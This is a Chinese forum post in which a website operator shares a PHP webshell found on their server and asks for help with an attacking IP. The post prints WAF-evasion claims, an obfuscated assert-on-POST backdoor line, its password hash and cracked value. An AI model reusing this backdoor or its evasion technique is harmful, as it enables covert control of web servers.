本帖最后由 蓝洛水深 于 2018-10-8 16:17 编辑
<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',0);
ini_set('memory_limit','8000M');
define('PASSWD','b55901cdec0d09c45e4766f4a62bee40');/*默认是admin,MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('\\','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft");
$pBVzO57KOVp='ID8+PD9waHAgZn
tools.php.tar.gz
(28.31 KB, 下载次数: 303)
b55901cdec0d09c45e4766f4a62bee40
解密后
qianjunlin33
最近收到各种木马,一个比一个强,头大
360、百度、云锁,已经确认都没有用

已经查到一个攻击IP
您查询的IP:198.1.175.249
本站数据:美国
参考数据1:美国加利福尼亚州洛杉矶 serveryou.com
参考数据2:美国
兼容IPv6地址:::C601:AFF9
映射IPv6地址:::FFFF:C601:AFF9
和对方服务提供商进行了工单投诉,对这家不熟,不知道哪位大佬熟悉 |